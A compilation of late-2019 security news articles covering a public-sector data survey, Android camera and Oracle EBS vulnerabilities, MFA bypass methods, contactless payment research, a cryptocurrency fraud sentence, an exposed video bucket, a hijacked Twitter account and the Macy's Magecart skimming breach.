STE WILLIAMS

Half of UK public sector IT chiefs think the data they’re responsible for protecting is less valuable than private sector information, according to a survey by antivirus firm Sophos.

Just over 50 per cent of 420 senior managers quizzed by Sophos agreed with the statement: “The data held by my organisation is less valuable than data in a private sector organisation.”

Sophos opined that this “could result in the under-protection of digital data, and sits at odds with the fact that IT leaders consistently rate their organisation’s threat level and risk as higher and wider than those dealing with every day IT issues”.

Those surveyed included C-suite bods right down to frontline IT teams “in the NHS, education and government sectors”, according to Sophos.

Spelling out why this belief that public sector data is less valuable than everyone else’s data is really quite dangerous, Jonathan Lee, Sophos’s UK public sector relations director, went through it step by step.

He said: “Sensitive data for up to 66 million UK citizens could become available to the highest bidder on the dark web or among other criminal groups that buy and sells personally identifiable information (PII) like names, addresses, National Insurance numbers, tax returns, confidential medical records, passport details, and more,” adding: “Cybercriminals can then use this data for spear-phishing, identity theft, breaching networks, or extortion.”

Two-thirds of senior IT folk said they had had problems with ransomware during the preceding year, while just 16 per cent of IT bods were incautious enough to make the same confession. Perhaps reflecting the state of media reporting on security, 45 per cent of execs reckoned there had been a “large increase” in “IT security incidents”, compared to an impressive 4 per cent of frontline techies.

Mildly worryingly, a fifth of non-managers responding to the survey said they didn’t know whether their organisation had a predefined process in place to deal with ransomware incidents, with a similar number saying there was no plan to deal with ransomware in their corner of the public sector IT estate. One in 10 middle managers thought their organisation had no ransomware plan at all, while 95 per cent of top execs thought there was.

On a lighter note, of the 784 people surveyed by Sophos, 39 per cent of senior execs thought the biggest cause for concern over IT security was the rise of remote and flexible working – while coalface IT bods thought malware was their biggest worry. When it came to cited issues, middle managers, meanwhile, were torn between (a lack of) employee skills and targeted ransomware attacks. ®

Sponsored:
How to get more from MicroStrategy by optimising your data stack

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/public_sector_it_chiefs_undervalue_org_data/

Unauthorized activities could be triggered even if a phone is locked, its screen is turned off, or a person is in the middle of a call.

A vulnerability in some Android phones from vendors including Google and Samsung could allow criminals to take control of hundreds of millions of users’ smartphone camera apps, enabling them to take photos, record videos and audio, and deduce locations — all without users’ knowledge or consent.

In a blog post Tuesday, Checkmarx researchers Erez Yalon and Pedro Umbelino described how they “cracked into the applications themselves that control these cameras to identify potential abuse scenarios.” They found permission bypass vulnerabilities, designated CVE-2019-2234, initially in two Google Pixel models that could allow a malicious actor to control the camera and gain access to stored photos, videos, and GPS metadata. The unauthorized activities could be triggered, the researchers wrote, even if a phone is locked, its screen is turned off, or a person is in the middle of a call. They went on to discover other phones running the Android operating system, including those from Samsung, had the same issue.

Yalon and Umbelino provided a proof-of-concept app that demonstrated how the vulnerability could be exploited. Under responsible disclosure procedures, Checkmarx first notified Google of the vulnerability in July. Google has released a patch for its devices via the Play Store and has made the update available to all hardware partners. Samsung and other vendors were notified in mid-August and have since released fixes.

Read more here. 

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “How Medical Device Vendors Hold Healthcare Security for Ransom.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/vulnerability-could-give-criminals-camera-control-on-millions-of-android-smartphones/d/d-id/1336413?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

SIM swaps, insecure web design, phishing, and channel-jacking are four ways attackers are circumventing MFA technology, according to the FBI.

The growing adoption of multifactor authentication (MFA) has resulted in a proportionate rise in cyberattacks that target MFA technologies. In a recent Private Industry Notification (PIN), the Federal Bureau of Investigation (FBI) recognized how recent cyberattack campaigns are focusing directly on circumventing MFA. The FBI outlined three specific and comprehensive tactics that hackers have been developing in order to bypass MFA. 

One of the first MFA notifications mentioned by the FBI PIN outlines the growing number of Subscriber Identity Module (SIM) card-swapping attacks. Each telephony-capable mobile device has an onboard SIM card, programmed with the customer’s phone number, and tied to his or her respective account with the carrier. A SIM-swap attack involves switching a victim’s phone number over to a different SIM card on a device controlled by a hacker. This is often accomplished through social engineering of cellular phone customer service representatives, who are often unprepared to handle these savvy adversaries.

To social engineer such an attack, an adversary tries to take advantage of a person’s naturally trusting tendencies. For example, the attacker might call the victim’s carrier posing as the victim in an emergency situation, demanding that the target phone number be transferred to a different SIM card on new device immediately. In an effort to help the struggling “customer” reach a resolution quickly, many representatives end up processing the hacker’s request. The result: The adversary now has a device with the victim’s phone number programmed to it, while cellular service to the victim’s actual device is disconnected. 

SIM Swap Insecure Web Design
The damage that can be wrought by a successful SIM swap can be catastrophic. If the perpetrator knows the victim’s credentials for a website, any text message MFA one-time password (OTP) will be sent to the victim’s number, which now arrives on the attacker’s device. Even if the adversary doesn’t know the victim’s credentials, it becomes possible to use the “forgot password” service to receive an MFA OTP text message that can be used to reset the victim’s password. The attacker can even call services posing as the victim, using the victim’s actual number. This number will be recognized by the service in question as legitimate, possibly allowing the attacker to bypass any additional security checks. With this level of control, it becomes possible to alter all credentials to lock the victim out of his or her own accounts. All the while, the victim remains unaware of these events, unable to make or receive calls or text messages on his or her own device.

Another MFA circumvention method outlined by the FBI is derived from poorly designed and insecure websites. The FBI highlighted how a competent attacker had previously managed to manipulate a vulnerable bank website into bypassing MFA. The adversary managed to accomplish this by inserting a custom command string into the web address once it presents an MFA request. The command string not only resulted in the MFA request being bypassed, but the bank also officially recognized the attacker’s computer as a trusted device on the victim’s account, resulting in unrestricted access to the account in question.

Phishing Channel-Jacking
The final method outlined by the FBI PIN includes phishing attacks, which still remain tried-and-true methods used by data thieves to trick a victim into revealing information. For example, an attacker can send a fake message purporting to be from the victim’s financial institution, demanding he or she open a link in the message or risk an account being shut down as a security precaution. The link takes the victim to a fraudulent website designed by the attacker that serves as a proxy to (and also resembling) the legitimate website, capturing and forwarding all interactions between the victim and the legitimate website in real time. Once the user is authenticated by the legitimate website, the adversary can capture the browser session cookie that the website associates with the authenticated user. Using the captured session cookie, the result is unrestricted access to the victim’s account. This type of attack is referred to as channel-jacking.

While these attacks can be quite effective at bypassing MFA, channel-jacking, in particular, requires advanced technical skills, including knowledge in reverse-proxy web server configuration. Various tools have been developed to streamline the overall phishing and response processes. One pair of tools the FBI highlighted was Muraena and NecroBrowser, which work in concert to automate the attack procedure. Unfortunately, by automating the complex processes involved in such campaigns, these tools allow attacks to be carried out with greater frequency, and on a much larger scale.

This column is an excerpt from an IHS Markit market report: “Multi-Factor Authentication is Becoming a Fundamental Security Necessity.”

Related Content:

• 6 Small-Business Password Managers
• I ‘Hacked’ My Accounts Using My Mobile Number: Here’s What I Learned
  
• The Myths of Multifactor Authentication

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Soft Skills: 6 Nontechnical Traits CISOs Need to Succeed.”

Tanner Johnson is a cybersecurity analyst focused on IoT and transformative technologies at IHS Markit. His coverage is focused on examining the various threats that occupy the IoT technology domain, as well as opportunities and strategies that are emerging as data … View Full Bio

Article source: https://www.darkreading.com/endpoint/why-multifactor-authentication-is-now-a-hacker-target/a/d-id/1336361?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers Leigh-Anne Galloway and Tim Yunusov chat about their work testing Visa’s contactless payments security system vulnerabilities.

Countless financial transactions are conducted every day by customers using contactless payment systems, and next month two security researchers from Positive Technologies will show Black Hat Europe attendees how vulnerable those transactions are to bad actors.

In their Black Hat Europe Briefing on First Contact – Vulnerabilities in Contactless Payments researchers Leigh-Anne Galloway and Tim Yunusov will show how they successfully bypassed (among other things) Visa’s £30 limit on contactless payments made via physical card in the United Kingdom. They’ll also demonstrate a few critical weak points in contactless payments, including flaws in key generation values and unpredictable numbers. 

I recently chatted with the pair about their work, what they’ve learned, and why it’s so important.

Alex: What do you hope to accomplish by giving this talk at Black Hat Europe?

Leigh-Anne: There are probably two outcomes that we’d like. The first is that payment security is a very under-subscribed area, so by talking at a venue like Black Hat, we’re hoping to interest other researchers in payments. There are incredibly high barriers, or at least it seems that way from the outside. But we want to show people that it is possible to work in this area.

Secondly, one thing we noticed is that even though we have this big growth in the financial sector, over the last year we’ve seen all these digital-only “neo-banks” spring up, and at the same time payments are being monopolized at the highest level. If you look under the surface of these new digital banks, a lot of them sit on the infrastructure of existing financial institutions, like other brick-and-mortar banks. And if you go higher up the levels of the payment infrastructure, it becomes more and more like a monopoly.

So when you don’t have much competition, you stagnate in terms of standards. That means that people like Visa and MasterCard can dictate how they want to work and how they want to operate in the marketplace, and no one else regulates them, because they are the regulators of everyone else.

Alex: A Visa rep was quoted in a Forbes article responding to your research by suggesting it wasn’t a threat worth addressing. How do you feel about that response?

Leigh-Anne: Visa and MasterCard have slightly different stances on how they approach things; it is rather infuriating, and I would imagine that some of the banks feel a bit similar, because it’s them saying “we can’t be bothered to do anything about that,’ whereas if you reported a security issue to a big corporation like Google, even if the issue wasn’t so significant, they’d probably resolve it rather than saying “we don’t want to do anything about it, go on your way.”

For example, there isn’t a formalized set of processes in the payment sector to deal with these things in the way that we see in bug bounty programs elsewhere, where you would formalize a process for how to categorize the risk of security issues, and how to resolve them.

But their stance is actually…in a lot of cases Visa says, based on their own data (though they don’t provide any clarity on what that data is) they say, “based on our own data, we don’t see applications of this attack in the wild, and therefore we’re not going to do anything about it.”

When we look at this idea [banks promote] that contactless payment systems have resulted in fraud reduction, you find really different views. Visa just published a statement, at the same time that we released information about our research, to say that they had a 40% reduction in fraud in contactless payments over the last two years. But if you look at the footnote, it says the source is just “Visa data” and there’s no explanation of the actual source.

If we look at data in the UK, if we look at the actionable data collected by the police, which is probably going to be on the conservative side because a lot of fraud doesn’t get reported to police, there are some significant losses. So it’s really hard to know what’s going on. 

Alex: What are you hoping Black Hat Europe attendees will get out of your talk?

Leigh-Anne: In plain language, I always try to think of payments as something everyone interacts with every day, but yet we have very little knowledge about how they work. So with the work that we do, and the presentation we’re giving, we’re hoping to remove some of that mystery and encourage people to get involved in this area, because it is massively undersubscribed, and there is a lot of work to be done.

Do you think more financial institutions should be implementing bug bounty programs, the way many tech companies do?

Leigh-Anne: I think it could be helpful. I think there’s a different view among some of those newer banks, the neobanks, where we’re finding some of them have adopted a bug bounty approach. But most of them don’t have any sort of formal framework. And if you look at the larger institutions, like HSBC, if you want to report a security issue to them, it’s almost impossible to work out how to do that.

I remember actually contacting customer services on chat and they said, “Oh you can just tell us, and we’ll pass along the information,” which…isn’t the appropriate way to share that information. But these are some of the challenges that we face. So I think it would probably accelerate a security standard; I mean of course the financial industry is pretty heavily regulated, but those standards don’t necessarily correlate strongly with security, as we know. You can be fully compliant and still be breached.

Learn more about Leigh-Anne and Tim’s Briefing (as well as lots of other cutting-edge content) in the Briefings schedule for Black Hat Europe, which returns to The Excel in London December 2-5, 2019.

For more information on what’s happening at the event and how to register, check out the Black Hat website.

Article source: https://www.darkreading.com/black-hat/black-hat-europe-qanda-exposing-the-weaknesses-in-contactless-payments/d/d-id/1336416?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

If you’ve been happily using Adobe Reader 2015 software for the last few years, you’re in for a rude awakening. The software vendor is ending support for these versions of its PDF-perusing product.

Adobe is bringing its support for two related products to an end: its free Acrobat Reader 2015 software, which enables people to open PDF documents without paying anything and perform basic edits, and the commercial Acrobat 2015 software that lets people create, convert, and add security and extra interactivity to their PDFs.

Adobe released both of these products in 2015, with Acrobat DC and Acrobat Reader DC. DC stands for Document Cloud, which is Adobe’s central cloud-based hub for managing documents.

The company’s Support Lifecycle Policy only provides five years of support from the date that its products become generally available. Adobe is pulling support on the products’ fifth anniversary, 7 April 2020.

At that point, customers won’t get technical support for their products, meaning that if you phone Adobe with a problem, its operatives won’t deal with it. More importantly, this end of support means that you won’t get any more security patches for the products either.

A lack of new security updates is a big deal, because vulnerabilities affecting later versions of its software often affect 2015 editions too. For example, it published a security advisory in October featuring seven ‘critical’ vulnerabilities and a further three ‘important’ ones, all of which affected the 2015 versions of Acrobat and Acrobat Reader.

What to do?

If you’re a 2015-edition user, you have two options.

You can trundle along with your existing software but run the risk of new vulnerabilities emerging for the product, rendering you vulnerable.

Or you can upgrade to the latest edition of Acrobat DC and Acrobat Reader DC.

You also have two options when you upgrade. You can stick with the purchasing track that affects the 2015 releases, which is the Classic track licence. This gives you software products updated on a regular quarterly cadence with minimal extra features. That contrasts with Adobe’s Continuous track, which provides regular, more frequent and often silent updates with more features.

This subscription-based option is definitely the one that Adobe wants you to follow. From its knowledgebase article:

Subscription plans are the best way to take advantage of everything Acrobat DC has to offer. New annual and month-to-month subscription plans make Acrobat DC more affordable than ever, while also giving you access to premium Adobe Document Cloud services.

If you don’t buy the subscription option then you won’t get access to Document Cloud-based services like the Adobe Sign e-signature service.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wKm8l-UJ2eQ/

A 39 year-old man from New York has been ordered to spend the next 18 months in prison after being convicted of cryptocurrency-based securities fraud.

Brooklyn-based Maksim Zaslavskiy was handed the sentence in the New York Eastern US District Court after being convicted on one charge of conspiracy to commit wire fraud. He will also have to pay out a monetary penalty yet to be determined by Judge Raymond Dearie.

Zaslavskiy was indicted (PDF) in November of last year for his actions as the owner of Diamond Reserve Club and REcoin Group Foundation, a pair of cryptocurrency investment schemes.

In both cases it was found that Zaslavskiy had marketed and sold cryptocoins on the promise that each was backed by a real-world asset. Those assets were then used to convince investors to buy into the initial coin offering (ICO), on the promise that the value of their coins would be sustained by those real-world holdings.

In the case of RECoin, the currency was touted as having its value backed by real estate holdings that would hold up the worth of the coins, while Diamond Reserve Club was said to be backed by ownership stakes in diamonds.

The offerings were also touted as having the support of “a team of lawyers, professionals, brokers and accountants,” who were all on board. Zaslavskiy even went so far as to create detailed whitepapers for each operation, designed to further make buyers believe their investments would be handled professionally.

What a pair of Massholes! New England duo cuffed over SIM-swapping cryptocoin charges

READ MORE

In both cases, however, it was found that there were no investments in any sort of real-world asset to back the coins, nor was there any team of professionals dedicated to backing the operation.

Rather, Zaslasvskiy simply pocketed all of the investment money and pulled the plug on the operation before any of the coins were ever issued, leaving buyers with nothing more than a worthless certificate. It was estimated that around 1,000 people lost money in the reCoin scheme, while no estimate was given for the number of Diamond Reserve buyers.

“Zaslavskiy committed an old-fashioned fraud camouflaged as cutting-edge technology,” said US Attorney Richard Donoghue, who lead the prosecution.

“This Office will continue to investigate and prosecute those who defraud investors, whether involving traditional securities or virtual currency.” ®

Sponsored:
Technical Overview: Exasol Peek Under the Hood

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/ico_scammer_gets_18_months/

Thousands of Oracle E-Business Suite customers are vulnerable a security bug that can be exploited for bank fraud.

Security company Onapsis estimates that roughly half of all companies using the Oracle EBS software have not yet patched CVE-2019-2648 and CVE-2019-2633, despite Big Red having pushed out fixes for both bugs back in April.

The two vulnerabilities are found in the Thin Client Framework API and are described as reflected SQL injections. An attacker who could remotely access the EBS server via HTTPS would be able to exploit the bug and send arbitrary commands to the vulnerable machine.

While this flaw is dangerous to EBS as a whole, it is particularly bad for servers that use the Payments module included with the suite. The Payments tool allows companies to set up and schedule direct deposits and automatic money transfers to suppliers or partners as well as handle invoices and orders. The bank routing and account numbers for transfer orders are kept on the server as text files and automatically loaded when needed.

You can guess where this is going.

An attacker who exploited either of the SQL injection flaws would be able to remotely modify those transfer order files to include instructions to move cash to an account of their choosing. Instant bank fraud.

For those not convinced, Onapsis has put together a proof-of-concept video showing how the attack would work.

Youtube Video

In a second scenario, Onapsis shows how the same bugs could be used for a slightly more old-school type of financial fraud: printing bogus checks. If the EBS server was also being used to print paper checks, the remote attacker would potentially be able to do that as well, though Onapsis notes the attacker would of course need access to the printer and the check templates, which might be stored on a different machine. Still, such an attack would at least be theoretically possible.

Europe’s digital identity system needs patching after can_we_trust_this function call ignored

READ MORE

While the bugs themselves are serious risks (both have been given CVSS scores of 9.9), perhaps even more worrying is the vast number of machines that are believed to be vulnerable, despite a patch for both having been out since April. Onapsis estimates that as many half of the companies running EBS have yet to actually patch their machines.

The low patch rates are in part a reflection of how most enterprise staff prioritize ERP and supply chain platforms like Oracle EBS when it comes to security. As these apps are rarely facing the general public, they can get overlooked.

“Overall, companies tend to underestimate ERP cybersecurity, since most of them rely on separation of duties or other security measures for these types of platforms,” Onapsis director of research Sebastian Bortnik told The Register.

“Based on this, it is unfortunately more common than expected to find ERP software without the latest security patches.”

Having stayed silent on the bugs since those April updates went out, the security firm is now posting additional details in hope that more will be pushed to patch their systems. ®

Sponsored:
Technical Overview: Exasol Peek Under the Hood

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/oracle_ebs_flaws/

A British video-editing startup exposed what is claimed to be “thousands” of user-uploaded videos, including family films and home-made pornography, in an unsecured Amazon AWS bucket.

Research by Noam Rotem and Ran Locar, for security biz vpnMentor, revealed that VEED.io left an AWS bucket completely unsecured and hosting what they summarised as “10,000s of videos” that were accessible to anyone visiting the bucket’s URL.

VEED bills itself as an online video-editing service that lets users add subtitles, text, effects and more to uploaded videos. A free tier allows this to be done for videos in 240px quality; anything better than that needs a subscription.

Rotem and Locar found that one could visit the landing page hosting the videos with a web browser and theoretically look through them at one’s leisure without needing to provide login details.

“The breached database compromised the privacy of every VEED user, exposing all content uploaded to the platform in its raw, unedited form. This included private videos of a very sensitive nature,” the pair said.

The videos were said to include “marketing material, family videos, and even home-made pornography”.

According to VPN Mentor, VEED ignored attempts in mid-October to alert them to the breach, nor did it respond to The Register‘s questions when we contacted it through Twitter earlier this week.

Having waited seven days with no reply from VEED, Rotem and Locar contacted Amazon directly, which closed off public access to the bucket nine days later.

“Criminals and malicious hackers could these videos against their creators to target them in various ways, with ruinous consequences, personally and financially,” said VPN Mentor, quite correctly pointing out that “private, intimate, home-made pornography is a valuable tool in blackmail and extortion”.

There is no mitigation for VEED users: because the videos were left online for anyone to view and download, changing your password and all the standard security advice that normally applies for a data breach won’t have any effect here. All you can do is hope that nobody’s downloaded your self-starring grumble flicks and recognised you. Contacting VEED itself would be a good idea but if the firm ignores both security researchers and questions from the media, this suggests they probably won’t bother answering customer questions.

The Israeli security research duo have revealed quite a few data breaches, including the Suprema Biostar 2 breach of August that revealed 27 million personal data records and the leaking of 20 million Ecuadorians’ data from a database hosted in Miami, Florida. Their report into Veed can be read on the VPN Mentor website. ®

Sponsored:
Technical Overview: Exasol Peek Under the Hood

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/20/veed_io_unsecured_aws_bucket_user_videos_exposed/

Brexit-supporting businessman Arron Banks has had his Twitter account hijacked and his private messages dumped online by person or persons unknown – and random script kiddies are trying to claim the credit for it.

Banks’ account was seemingly accessed two days ago, with @arron_banks on Twitter (since suspended) being used this afternoon to spread links to a Mega.nz download page hosting a dump of the Twitter account’s full archive.

Blame for the hack was briefly claimed by an account on the social network registered as @WhitePings, who alleged it was a successful SIM swap attack carried out by whoever operated the account. However, its operators simply took other people’s screenshots of the stolen data and claimed them as their own.

One showed raw JSON being viewed in either Microsoft Word or Open Office, which aside from the obvious plagiarism seems unlikely from people capable of carrying out a SIM swap attack. Unfortunately, @WhitePings was suspended before The Register could grab screenshots.

Coming during a general election campaign where Brexit is the number one issue, the illegal accessing of Banks’ account and publication of his private direct messages, sent to other prominent political and media figures, has piqued the interest of the political and media classes alike.

Banks used his personal fortune to help fund the UK Independence Party under Nigel Farage, later switching to funding the Leave.EU campaign group. The latter played a very prominent part in the 2016 referendum on Britain leaving the European Union, and was allegedly linked to dodgy data-crunching biz Cambridge Analytica. Banks’ company, Eldon Insurance, and Leave.EU were later fined £120,000 by the Information Commissioner’s Office for using people’s personal data for politican campaigning for Brexit.

Twitter account archives are part of the social media platform’s policy to let users access more of the data they happily hand over to Twitter, as explained here.

Police, GDPR, legal threats

Avon and Somerset Police has confirmed that it is investigating, with a spokesman telling the BBC: “We’re investigating whether any offences have been committed under the Computer Misuse Act after we received a report a Twitter account was compromised.”

Leave.EU’s comms chief Andy Wigmore, a friend of Banks and fellow anti-EU campaigner, tweeted this earlier:

Oh dear looks like @Twitter (who still have not responded to us) have broken GDPR rules and the @ICOnews won’t look kindly at this @metpoliceuk @kingsleynapley

— Andy Wigmore (@andywigmore) November 19, 2019

Even in the midst of our departure from the bloc, the EU’s General Data Protection Regulation still serves some Britons well. Wigmore also said that “under the Computer Missuse Act we can and will come after you legally” if people download the data dump. El Reg is not completely sure how that works, or if he’s heard of the Streisand Effect.

Fake news is already being spread

Political campaigners immediately leapt on purported leaks from the messages to bolster their claims Banks is some kind of inherently evil wrongdoer who cares for nothing in his pursuit of political power…

What’s this? Nothing much. Just Arron Banks (Nigel Farage’s top funder) dismissing Leave voters in North as “Northern Monkeys” who he doesn’t give a toss about with ‘man of the people’ Dominic Raab.

Banks is a fraud! #arronbanksleaks pic.twitter.com/9rJmm9W2kd

— Our Future, Our Choice (@OFOCBrexit) November 19, 2019

… however, this one is faked and access to the stolen data is not necessary to confirm the fakery. The arron_banks account (now suspended from Twitter) had the unique number 3390728889. Unique account ID numbers mean even if a Twitter user changes their username, the account itself can still be tracked.

Infosec boffins pour cold water on claims Home Office Brexit app can be easily hacked

READ MORE

The image in the above embedded tweet is saved here.

In that image, purporting to show raw JSON from Banks’ direct messages, the number for arron_banks checks out against the fields “senderId” and “recipientId” in two such messages. However, the receiving account number, 16373287, does not validate at all against two different account number-checking services.

Both messages share the same unique ID – 833613156532080837 – which is not possible for genuine tweets or direct messages, which are all assigned a unique numeral. Moreover, the timestamp for the upper message says it was sent at 13:40:422 on 2 November 2019, whereas the second message was apparently sent precisely five hours later (18:40:422) to within one hundredth of a second. The odds of this are wholly implausible.

Sensible folk would do excellently to follow this advice:

Dear all –

With #arronbanksleaks, just be careful.

It’s very easy to circulate screenshots that are not validated. Or get excited by content therein.

If there was a leak, it was illegal. There might also be significant disinfo deliberately circulated. Patience is a virtue.

— Mike Galsworthy (@mikegalsworthy) November 19, 2019

Banks, via his Leave.EU political campaign, did not respond immediately to a request for comment. ®

Sponsored:
Beyond the Data Frontier

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/19/arron_banks_twitter_hack/

US retailer Macy’s says that hackers planted a card-stealing malware script on its site and harvested customer details for eight days last month.

A notice (PDF) posted by the long-operating department store chain said that, between October 7 and October 15 of this year, a Magecart script was running on the checkout page of its retail website.

The script was able to capture payment card details in two different ways: as it was being entered through the checkout page when placing an order, or if it was stored in the “wallet” page on the Macy’s website and then used to place an order.

“On October 15, 2019, we were alerted to a suspicious connection between macys.com and another website,” the retailer told exposed punters.

“Our security teams immediately began an investigation. Based on our investigation, we believe that on October 7, 2019 an unauthorized third party added unauthorized computer code to two pages on macys.com.”

Unfortunately for Macy’s customers, the script got pretty much everything needed for card fraud: card number, security code, and expiration date. Additionally, the malware was able to collect customer names as well as email and mailing addresses and phone numbers.

Macy’s notes that only the webpage was compromised: users who made purchases with the mobile app were not exposed. Experts say that the attack appears to be a rather bog-standard Magecart operation, albeit an extremely successful one.

It’s never good when ‘Magecart’ and ‘bulletproof’ appear in the same sentence, but here we are

READ MORE

“The fundamentals of the attack techniques and the obfuscated Javascript code used by the malicious Magecart threat actors in the Macy’s cyberattack involving changes to two files on the Macy’s website, including the ClientSideErrorLog.js file which is part of the common js/utils repository, are not new and appear to be similar to the digital skimming techniques and code used in a number of other Magecart attack variants we have seen in recent months,” explained Oleg Kolesnikov of Securonix Threat Research Lab.

“The infrastructure used in the attack, including the barn-x.com domain and the customized analysis.php script as part of a cPanel installation that was set up at the end of September 2019, a couple of weeks before the attack on Macy’s was executed, also appears to be similar to the one used in some of the earlier attacks, indicating that this was likely more of an opportunistic cyberattack involving certain vulnerable components identified by the malicious threat actors rather than a targeted attack against Macy’s.”

That these sort of Magecart operations continue to succeed is a bad sign for both retailers and security providers. Because the code can be covertly injected directly into a webpage, Magecart attacks can be harder to spot than POS malware or infections that need to reside within the server’s firmware.

Macy’s customers who were exposed in the attack (a number was not given) would be well advised to keep a close eye on their bank statements over the next few months or, better yet, have their bank card replaced entirely. ®

Sponsored:
Beyond the Data Frontier

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/19/macys_magecart_infection/